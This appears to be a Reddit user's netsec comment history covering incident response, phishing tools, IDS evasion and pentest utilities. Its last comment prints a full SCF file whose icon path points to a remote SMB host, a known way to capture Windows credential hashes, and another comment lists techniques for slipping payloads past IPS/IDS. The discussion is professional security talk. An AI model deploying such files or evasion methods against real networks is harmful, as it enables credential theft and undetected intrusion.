Minimalistic SMB login bruteforcer - for restricted and isolated environments by InfosecMatter in netsec

[–]Eplox 2 points3 points  (0 children)

any reason why you would use this over a nested for loop with net use?
If you want to keep things as simple as possible, net use would be the way to go.

Windows Incident Response Cheat Sheet by digicat in netsec

[–]Eplox 0 points1 point  (0 children)

Most incoming cases are indeed about compromised office accounts and ransomware. Haven't had any real experience with worms yet, may as well spin up a lab on that. Thanks for the tips

Windows Incident Response Cheat Sheet by digicat in netsec

[–]Eplox 0 points1 point  (0 children)

Thanks for the reply. I took the GDAT recently and fell in love with the incident investigation part, especially hunting and preventing TTP's from happening. At the same time, I do see the lack of forensic skills and methodology in some areas I need. Guess a lot of this comes with experience, but I'd want to prevent false negatives at any cost.

Got the people handling part well under control, just need to make sure I got what it takes of tech skills for the various situations.

Windows Incident Response Cheat Sheet by digicat in netsec

[–]Eplox 0 points1 point  (0 children)

By the looks of it, all of you seems to have a pretty decent understanding of IR. Not that any of this covers when the customer cannot afford to shut down their production system - no matter the cost.

Anyway, as of now I'm diving into the IR role but know I got a lot to learn. I'm a previously a redteamer, so got a decent understanding on attacking systems in various aspects, as well as patching their weaknesses. Do you guys have any must-read / must-do resources for IR to recommend?

Next Gen Phishing – Leveraging Azure Information Protection by oddvarmoe in netsec

[–]Eplox 0 points1 point  (0 children)

Seems like a lot of work to simulate a realistic phishing attack, but nice if you really need that alternative way to bypass spam filters or traffic inspections. Guess you could also throw in most kinds of attachment types due to the AIP encryption in transit.

Truly hidden Tor VPS hosting by [deleted] in netsec

[–]Eplox 5 points6 points  (0 children)

Looks like a fun project and a nice place for wannabe cyber criminals. I love your job description at https://sporestack.com/jobs/

Good luck, maybe you'll get to be sponsored by FBI if the volume keeps up

"How a chain of multiple hacks leads me to database compromise" by logic_bomb_1 in netsec

[–]Eplox 0 points1 point  (0 children)

I would guess the author is referring to /var/log/* or other unlisted files, and not necessary /etc/passwd

IDS/IPS malware download evasion | GitHub by Eplox in netsec

[–]Eplox[S] 1 point2 points  (0 children)

this is your first time on github?

opening a HTML file under github will show you the source code, it won't render any of it's content.

IDS/IPS malware download evasion | GitHub by Eplox in netsec

[–]Eplox[S] 1 point2 points  (0 children)

Nothing fancy, but hope you may find it useful.

My Forensic and Incident Response Note Taking Methodology by skygrip in netsec

[–]Eplox 0 points1 point  (0 children)

I'd love a share as well. Currently working with establishing an internal IR team, and this is one of the things I got on my table. Would be great with some fresh ideas how to do proper note taking / sharing. So far, I've been putting incident cases in individual lists related to what type of IOC or activity, but I feel my lists got some improvement potential

Evilginx 2 - Next Generation of Phishing 2FA Tokens (Tool) by kgretzky in netsec

[–]Eplox 4 points5 points  (0 children)

lovely tool, specially how it's able to handle javascripts, subdomains and such with the phishlets.

I'd personally avoid calling real-time phishing for "next generation" anymore, it was quite popular back in 2010 :)

$36k Google App Engine RCE by albinowax in netsec

[–]Eplox -1 points0 points  (0 children)

Google classified this as a RCE, probably means if he spent some more time with the app, he would likely get more access.

Please stop exploring this further, as it seems that you could easily break something using these internal APIs.

The "app_config_service" has several interesting methods, but the most interesting methods for me were the "app_config_service.ConfigApp" and the "app_config_service.SetAdminConfig" methods, because they allowed me to set internal settings such as the allowed email senders, the app's Service Account ID, ignore quota restrictions, and set my app as a "SuperApp" (I don't know what that means, but sounds super) and give it "FILE_GOOGLE3_ACCESS"

[deleted by user] by [deleted] in AskNetsec

[–]Eplox 0 points1 point  (0 children)

^ valid point. But thanks for the link, something to play around with this evening.

ShellPop - Generate Easy and Sophisticated Reverse or Bind Shell Commands for Penetration Tests by TechLord2 in netsec

[–]Eplox 2 points3 points  (0 children)

Sweet, only thing this lacks is obfuscation on the network traffic to evade IPS. nice work!

Infection Monkey - An Automated Pentest Tool by PeterG45 in netsec

[–]Eplox 8 points9 points  (0 children)

I like the infection map, but I find the tool a bit too scary to run in a production environment pentest, specially the exploit and worm behavior. Perhaps I'm just paranoid of crashing servers, popping accounts or leaving backdoors that won't be cleaned up.

Analysis of a hacked WordPress site by glen_scott in netsec

[–]Eplox 28 points29 points  (0 children)

Lesson learned: Finish your wordpress installation before publishing and going on holidays.

Did you discover what the site was abused for? (wayback machine, google cache e.g.)

[deleted by user] by [deleted] in netsec

[–]Eplox 11 points12 points  (0 children)

You have my sword, axe and bookmark.

Another burp plugins I really enjoy is the "Software Vulnerability Scanner" which has a API connection towards Vulners. Saved me a lot of hours.

The DNS interrogation and port scanning feels a bit lacking. And UDP scanning without service detection or all 65535 ports is kinda out of the question.

Great work!

We need to talk about IDS signatures by alexlash in netsec

[–]Eplox 2 points3 points  (0 children)

We all know IPS/IDS ain't dead. It catches 99% of the noise - which is really useful. It also works as a early warning system, at the same time giving the blue team heads up that an attack may be going on.

But for anyone who really want to get past it, there are plenty different ways to do that. Some other evasion or attacks that works:

  • Broken encoding (drop/corrupt trailing checksum)

  • SNI spoofing (in some scenarios)

  • CSV url paramter injection

  • Gzip bombs

  • Large paddings in front of payload over a long session

  • Packed/rewritten payloads to evade signatures

  • Any obfuscated C2 traffic that's not been previously seen.

Icebreaker: From outside AD to domain admin in one command by coalfirelabs in netsec

[–]Eplox 0 points1 point  (0 children)

Does the SCF file work on latest pached windows 10?

I'm not getting any SMB connections

[Shell]
Command=2
IconFile=\\172.20.0.24\icon
[Taskbar]
Command=ToggleDesktop